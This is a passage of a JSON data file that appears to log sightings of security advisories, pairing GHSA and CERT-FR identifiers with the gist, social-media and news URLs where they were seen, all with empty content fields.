"https://gist.github.com/konard/e4ff52b4a17455dcbba82236d5b5750f", "content": "", "creation_timestamp": "2026-07-03T15:57:53.221544Z"}, {"uuid": "1686dcfb-82ab-455d-9a36-8c4c74739a00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w5hq-g745-h8pq", "type": "seen", "source": "https://gist.github.com/konard/059f5db695bb3dd8b1f18c488fa63f52", "content": "", "creation_timestamp": "2026-07-03T17:18:37.292700Z"}, {"uuid": "75bb9036-702b-4dbc-a343-532d05aabc36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-72gw-mp4g-v24j", "type": "seen", "source": "https://gist.github.com/konard/059f5db695bb3dd8b1f18c488fa63f52", "content": "", "creation_timestamp": "2026-07-03T17:18:35.945221Z"}, {"uuid": "819b9b21-3861-4f1f-ad01-163e3d583cc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3p4h-7m6x-2hcm", "type": "seen", "source": "https://gist.github.com/konard/059f5db695bb3dd8b1f18c488fa63f52", "content": "", "creation_timestamp": "2026-07-03T17:18:34.507166Z"}, {"uuid": "c2d5d5d1-fdac-4248-bff0-31d51c575c31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2pvr-wf23-7pc7", "type": "seen", "source": "https://gist.github.com/konard/88609dd395d6031e4d410d3826dc1450", "content": "", "creation_timestamp": "2026-07-05T13:35:38.531866Z"}, {"uuid": "5db506cd-68f5-4143-b0ac-cf5abc958db3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j687-52p2-xcff", "type": "seen", "source": "https://gist.github.com/konard/88609dd395d6031e4d410d3826dc1450", "content": "", "creation_timestamp": "2026-07-05T13:35:36.872528Z"}, {"uuid": "3f1ea8ce-2784-42c8-85ec-87cb00858ba3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jp82-jpqv-5vv3", "type": "seen", "source": "https://gist.github.com/ftnext/49c236d15e6d1d49960f59d346e70a25", "content": "", "creation_timestamp": "2026-07-05T14:13:06.089487Z"}, {"uuid": "e59f3cc3-2b4a-4280-93ab-cb536076c41e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vg6x-rcgg-rjx6", "type": "seen", "source": "https://gist.github.com/konard/dfb7871ab0b11ef9be6fa6562ba59998", "content": "", "creation_timestamp": "2026-07-05T18:13:19.547673Z"}, {"uuid": "8ee29787-a9f3-456f-9196-23e472a724db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-3fmp-59v6-4qw2", "type": "seen", "source": "https://bsky.app/profile/offseq.bsky.social/post/3mpwrvj6vez2g", "content": "", "creation_timestamp": "2026-07-06T00:00:40.345494Z"}, {"uuid": "3ca3852a-ef6c-45a5-8a76-9c194c8523d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-3fmp-59v6-4qw2", "type": "seen", "source": "https://infosec.exchange/users/offseq/statuses/116870089136632895", "content": "", "creation_timestamp": "2026-07-06T00:00:38.688616Z"}, {"uuid": "72eec984-1a92-4660-9fac-408ada58e320", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jv8r-gqr9-68wj", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mpysnxoqkx22", "content": "", "creation_timestamp": "2026-07-06T19:19:40.233322Z"}, {"uuid": "5fa2d03e-de0d-4f25-85db-cc691a2e82bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pjmc-gx33-gc76", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mpysnxoqkx22", "content": "", "creation_timestamp": "2026-07-06T19:19:40.178703Z"}, {"uuid": "d95e1afa-2862-499c-bf95-6c95119e23f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x76w-8c62-48mg", "type": "seen", "source": "https://gist.github.com/alon710/b825af035610849f3142d75d4e2989fc", "content": "", "creation_timestamp": "2026-07-06T20:41:52.810879Z"}, {"uuid": "db2252d2-ba53-4900-b0d7-45a1e5b93a93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-287w-mxq6-x2cp", "type": "seen", "source": "https://gist.github.com/alon710/42394c2aa3975303824ce1e33bac787e", "content": "", "creation_timestamp": "2026-07-06T21:42:10.999469Z"}, {"uuid": "52f8d799-be05-4633-a669-0c5f26742af0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5493-9m76-2qrr", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mpz22a66p72b", "content": "", "creation_timestamp": "2026-07-06T21:31:47.581504Z"}, {"uuid": "2e4298ba-6b18-47bf-8ec2-f65523124c7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-QRWJ-VH9X-GW5V", "type": "seen", "source": "https://gist.github.com/alon710/ec3008cd5d92754b3b0eaadc74d4e7e1", "content": "", "creation_timestamp": "2026-07-07T00:11:42.414122Z"}, {"uuid": "567681ad-e917-4680-9bb7-3e8d4e03970c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rq8f-9xjh-pr3m", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mpzcgei5er2s", "content": "", "creation_timestamp": "2026-07-07T00:01:44.854273Z"}, {"uuid": "a0c90494-bc05-42b6-b5ea-ed914fe986b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v5wf-j8j4-77h7", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mpzcgei5er2s", "content": "", "creation_timestamp": "2026-07-07T00:01:44.812487Z"}, {"uuid": "1722df2b-05bf-458c-aea9-a78d13b9409a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-47fr-jw86-c3fj", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mpzcgdgwvk2h", "content": "", "creation_timestamp": "2026-07-07T00:01:43.652303Z"}, {"uuid": "d757111e-7e8c-443f-bb90-8a4ad6d0dae8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mp3f-59pg-c5pp", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mpzcgdgwvk2h", "content": "", "creation_timestamp": "2026-07-07T00:01:43.615605Z"}, {"uuid": "e3ed8e99-928b-4847-b9fe-c1cd2f395734", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v64m-xxfw-hrv6", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mpzcgdgwvk2h", "content": "", "creation_timestamp": "2026-07-07T00:01:43.573876Z"}, {"uuid": "359d09aa-7274-4338-b89e-f6cdbd021617", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-72j9-356v-88xq", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mpzcgcfkjb2s", "content": "", "creation_timestamp": "2026-07-07T00:01:42.846585Z"}, {"uuid": "8a2e7de3-0a47-4121-a650-9f4df5cae18c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f27x-frr8-j9hc", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mpzcgcfkjb2s", "content": "", "creation_timestamp": "2026-07-07T00:01:42.813078Z"}, {"uuid": "e305191c-2e54-4b7b-84ca-17bdaaac9316", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9g22-w2gr-vcmp", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mpzcgcfkjb2s", "content": "", "creation_timestamp": "2026-07-07T00:01:42.774645Z"}, {"uuid": "8c0a923a-7feb-4df8-8f62-ffa4c45390e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jv8r-gqr9-68wj", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mpzcfyt62f2d", "content": "", "creation_timestamp": "2026-07-07T00:01:32.645646Z"}, {"uuid": "25247ac8-bf8d-4e83-a6f7-e037b6885285", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pjmc-gx33-gc76", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mpzcfyt62f2d", "content": "", "creation_timestamp": "2026-07-07T00:01:32.605763Z"}, {"uuid": "ab57ab1e-5d04-4f1c-a84f-537717511dc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6wfj-rwm7-3542", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mpzcfxrzrc23", "content": "", "creation_timestamp": "2026-07-07T00:01:31.762215Z"}, {"uuid": "3c698deb-f222-4ab1-b422-6c5ac37a3692", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-CGFV-JRFP-2R7V", "type": "seen", "source": "https://gist.github.com/alon710/031e4a60a1dad95089a914b9f0b56e00", "content": "", "creation_timestamp": "2026-07-07T00:41:49.224888Z"}, {"uuid": "2a3e2bed-ab32-41e3-8647-6d6f98c58c46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f74w-488g-8x5r", "type": "seen", "source": "https://gist.github.com/alon710/8f065297b373724c4dd370345047c8bb", "content": "", "creation_timestamp": "2026-07-07T01:11:51.131940Z"}, {"uuid": "4a43c5ed-0fb7-4dd9-9f84-528bd4949361", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xrqc-p465-2xvg", "type": "seen", "source": "https://gist.github.com/alon710/1b2e654724e66f79f392f0bd62b60dc4", "content": "", "creation_timestamp": "2026-07-07T01:42:10.859768Z"}, {"uuid": "d85dd133-5c19-40cd-9764-c79045f814be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-24x4-j6x9-rfw5", "type": "seen", "source": "https://gist.github.com/alon710/3d0e76ebb14fa6d7f10ac4854f1f3070", "content": "", "creation_timestamp": "2026-07-07T02:12:20.702623Z"}, {"uuid": "f4efaaf5-1df7-44d7-bd14-e44ba8aa9909", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4hf7-xxxw-64rm", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mpzjbl2rdb22", "content": "", "creation_timestamp": "2026-07-07T02:04:20.339488Z"}, {"uuid": "64cc899d-86b3-4ea1-9b3d-c7697f38e2b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vjc7-jrh9-9j86", "type": "seen", "source": "https://gist.github.com/alon710/6a50137ec82734dd8b73a28b2639fdfa", "content": "", "creation_timestamp": "2026-07-07T02:42:04.700933Z"}, {"uuid": "95b5c5fb-d8e3-4f11-b872-acb105de33d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-73rr-hh4g-fpgx", "type": "seen", "source": "https://gist.github.com/RNZ01/baf1544c4d334617b033b8f542841f40", "content": "", "creation_timestamp": "2026-07-08T13:54:29.017141Z"}, {"uuid": "d19763a5-f884-4f05-a80a-1c1d9e9338eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w54j-7wpm-crhj", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mq5e7yeusk2s", "content": "", "creation_timestamp": "2026-07-08T14:44:37.183601Z"}, {"uuid": "20268b7a-9b77-471e-be4b-e0cd3a16bf6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hwmj-qg4v-cvg9", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mq5e2piu2p26", "content": "", "creation_timestamp": "2026-07-08T14:41:40.287962Z"}, {"uuid": "0c5cfa29-0b46-4249-8cc5-8ed8c1e77a5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q95x-7g78-rccv", "type": "seen", "source": "https://gist.github.com/alon710/e724b6feec120f49892cbfa2764ae8ba", "content": "", "creation_timestamp": "2026-07-08T20:42:49.845130Z"}, {"uuid": "591bf4c5-aa69-4e96-bc59-cd66a036b179", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MXWC-WH95-PW4G", "type": "seen", "source": "https://gist.github.com/alon710/f9b0746c1419f68b39813326daf32fa7", "content": "", "creation_timestamp": "2026-07-08T21:12:14.933821Z"}, {"uuid": "aa6bab6e-1478-4250-b5eb-5c864ad1bee9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-37h2-6p4f-mp3q", "type": "seen", "source": "https://gist.github.com/alon710/faf458b17f73f7d92e775ebdde2a6b10", "content": "", "creation_timestamp": "2026-07-08T21:42:03.785107Z"}, {"uuid": "32f4a0b0-948f-4d0a-a9e5-722d9e238950", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vmwx-m75v-qvch", "type": "seen", "source": "https://gist.github.com/alon710/f5073530cad3dd719e641dcee2ba88b8", "content": "", "creation_timestamp": "2026-07-08T22:12:23.442041Z"}, {"uuid": "c745a32f-43e9-4113-830d-8c3ff698e03f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6FX6-WRPF-CPGV", "type": "seen", "source": "https://t.me/brutsecurity/1014", "content": "", "creation_timestamp": "2026-07-09T03:00:12.198870Z"}, {"uuid": "5ba389ed-37ac-42ef-a560-2f4b5ec268bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4vj7-5mj6-jm8m", "type": "seen", "source": "https://gist.github.com/alon710/6a1f370c6283107f299350100ca84db2", "content": "", "creation_timestamp": "2026-07-10T15:11:59.667663Z"}, {"uuid": "d6633f03-f825-4dfa-87ea-a2afdc3b6096", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hjr6-g723-hmfm", "type": "seen", "source": "https://thehackernews.com/2026/07/researcher-details-whatsapp-to-host.html", "content": "", "creation_timestamp": "2026-07-10T16:01:02.789025Z"}, {"uuid": "8da5fdb6-ae7e-4cfa-b9e4-a149e264b19c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pjhx-3c3w-9v23", "type": "seen", "source": "https://gist.github.com/alon710/a56efdb02fd3817ca2ff1035bbcd74e4", "content": "", "creation_timestamp": "2026-07-10T15:41:54.341887Z"}, {"uuid": "a9241dfc-8658-4e36-8b75-6e7f55b29d51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-489G-7RXV-6C8Q", "type": "seen", "source": "https://gist.github.com/alon710/bb39e6fca7620239b1bd8e5a02d98b4e", "content": "", "creation_timestamp": "2026-07-10T18:42:23.184898Z"}, {"uuid": "7a0e6a0a-3072-4b60-9fe3-d139c2bc459d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-PP25-4CG4-QCR9", "type": "seen", "source": "https://t.me/GithubRedTeam/102707", "content": "", "creation_timestamp": "2026-09-18T20:00:03.828909Z"}, {"uuid": "a1e64e82-d4f2-4a3d-93b6-3da21cd320bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3753-m2x2-q623", "type": "seen", "source": "https://bsky.app/profile/standup.thecompound.tech/post/3mvsvj6zwrr2q", "content": "", "creation_timestamp": "2026-09-18T19:25:52.478035Z"}, {"uuid": "2b5945e7-c6bb-475e-afca-ac3bc811166f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jgh3-fggc-mcpm", "type": "seen", "source": "https://gist.github.com/alon710/f13f4c40382dd44335baac4abb0ac5c3", "content": "", "creation_timestamp": "2026-09-18T18:32:04.396592Z"}, {"uuid": "f9d4cd3c-f882-447f-aa53-647c2d9a77be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xcw4-53cc-hv32", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/117293336010618012", "content": "", "creation_timestamp": "2026-09-18T17:57:53.471663Z"}, {"uuid": "f17aa1b1-199b-49d5-a57f-5709a94bd306", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-JR78-W6W5-M8F8", "type": "seen", "source": "https://gist.github.com/alon710/c717d80a2868c0cd23fe72b7b90934a0", "content": "", "creation_timestamp": "2026-09-18T17:31:14.780243Z"}, {"uuid": "24667ffe-7e56-41fe-9843-e680c350225c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c8w2-fgvx-vhv4", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/117293177991210305", "content": "", "creation_timestamp": "2026-09-18T17:17:42.260576Z"}, {"uuid": "a50feb7b-4ade-4449-bee5-d02629ef8a6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2vh9-42vm-xmv2", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/117293162817116098", "content": "", "creation_timestamp": "2026-09-18T17:13:51.211403Z"}, {"uuid": "d6c580f4-9105-4379-a9a5-983f46ac7b72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m6c8-jcw2-5r25", "type": "seen", "source": "https://bsky.app/profile/standup.thecompound.tech/post/3mvskcvaglu2g", "content": "", "creation_timestamp": "2026-09-18T16:05:29.887079Z"}, {"uuid": "a91be477-7ecd-42ce-b475-fc99cbb424b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-26vp-8gxg-v4pg", "type": "seen", "source": "https://bsky.app/profile/kyisaiah47.thecompound.tech/post/3mvsk2ztiel2g", "content": "", "creation_timestamp": "2026-09-18T16:01:06.423488Z"}, {"uuid": "b31de360-9adb-4bcc-aeb4-746b5ec88c8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j8px-rmrx-76h9", "type": "seen", "source": "https://gist.github.com/alon710/1cc5e28018afd10dbf96bffc511ba50d", "content": "", "creation_timestamp": "2026-09-18T15:31:48.710240Z"}, {"uuid": "278b9dbe-286e-4592-aec4-963110ad77be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m6c8-jcw2-5r25", "type": "seen", "source": "https://gist.github.com/alon710/a61fcfa28224e9a745d03ea7d19d70bf", "content": "", "creation_timestamp": "2026-09-18T14:31:27.713090Z"}, {"uuid": "eadb0a64-2ee2-4cdc-9582-cd5087fe0be5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r78r-rwrf-rjwp", "type": "seen", "source": "https://gist.github.com/alon710/95012eaaac31573d3f20cff3cfbc3e84", "content": "", "creation_timestamp": "2026-06-19T14:11:51.000000Z"}, {"uuid": "e8b455c2-4a8b-4468-b1da-6a9110f499a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j3vx-cx2r-pvg8", "type": "seen", "source": "https://gist.github.com/alon710/95012eaaac31573d3f20cff3cfbc3e84", "content": "", "creation_timestamp": "2026-06-19T14:11:51.000000Z"}, {"uuid": "513c5661-a95e-4240-b4d1-f4bb4f9ae436", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vxpw-j846-p89q", "type": "seen", "source": "https://gist.github.com/alon710/cb38e049872764207b2ad97489bbd503", "content": "", "creation_timestamp": "2026-06-19T14:41:40.000000Z"}, {"uuid": "690d89f0-1118-4218-b6b9-086e3ad2743e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VCV2-R9JH-99M5", "type": "seen", "source": "https://gist.github.com/alon710/fca46c1ce608de0751f3ec7bdc815dc8", "content": "", "creation_timestamp": "2026-06-19T15:42:13.000000Z"}, {"uuid": "b8ec1658-781d-4b92-b0e0-9e49351fb061", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7mxq-qhvq-grhg", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116792836619222060", "content": "", "creation_timestamp": "2026-06-22T08:34:24.642537Z"}, {"uuid": "2e6c4599-b460-4a7e-81ee-11e848f00653", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-39j6-789q-qxvh", "type": "seen", "source": "https://bsky.app/profile/mfahlandt.bsky.social/post/3mouxgsffum2z", "content": "", "creation_timestamp": "2026-06-22T13:09:18.602370Z"}, {"uuid": "d97b70f5-a5c0-4fe8-8205-b76a82445c0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-027", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116793994374387639", "content": "", "creation_timestamp": "2026-06-22T13:29:08.170925Z"}, {"uuid": "2430608b-54be-413c-bf4d-d66225c12f31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-027", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mouyjlshrm2z", "content": "", "creation_timestamp": "2026-06-22T13:28:44.997422Z"}, {"uuid": "5d8c1196-4ad9-4835-a276-270524c90f21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-027", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mouyy777i42h", "content": "", "creation_timestamp": "2026-06-22T13:36:55.169025Z"}, {"uuid": "a6eb607a-2f32-4b64-9317-08d08a26fc69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-ghmh-jhmj-wcmf", "type": "seen", "source": "https://gist.github.com/alon710/36f3399c6d42cf95c9294583be143e55", "content": "", "creation_timestamp": "2026-06-23T08:41:51.000000Z"}, {"uuid": "e5dd82b3-0175-4089-94cc-64aff7725075", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4q6h-8p4v-67vq", "type": "seen", "source": "https://gist.github.com/alon710/ca5754f7e7e7aeff3ad1cd262378f58b", "content": "", "creation_timestamp": "2026-06-23T09:41:50.000000Z"}, {"uuid": "aca7acce-9d2c-4db8-8240-b0d7b0f4f85d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9395-2G46-RJ3F", "type": "seen", "source": "https://gist.github.com/alon710/cb18b141add55b295dbcd30cffe58ba1", "content": "", "creation_timestamp": "2026-09-18T13:32:11.125840Z"}, {"uuid": "d3018e2b-c0d4-4623-9597-d042b584c5c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gjv8-xp57-g29c", "type": "seen", "source": "https://gist.github.com/alon710/28e39e82ccb12ea34e715caa280614a0", "content": "", "creation_timestamp": "2026-09-18T05:31:29.967765Z"}, {"uuid": "d3302b36-3ee8-4c49-9147-3b9510417305", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9gm5-9rfh-m6vx", "type": "seen", "source": "https://gist.github.com/alon710/e7a608459f9cd16dd9b84291002561e5", "content": "", "creation_timestamp": "2026-09-18T04:31:38.474426Z"}, {"uuid": "72be2e24-f9e6-45ed-a586-6ff50f0fafb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5gf7-wjfm-vmvm", "type": "seen", "source": 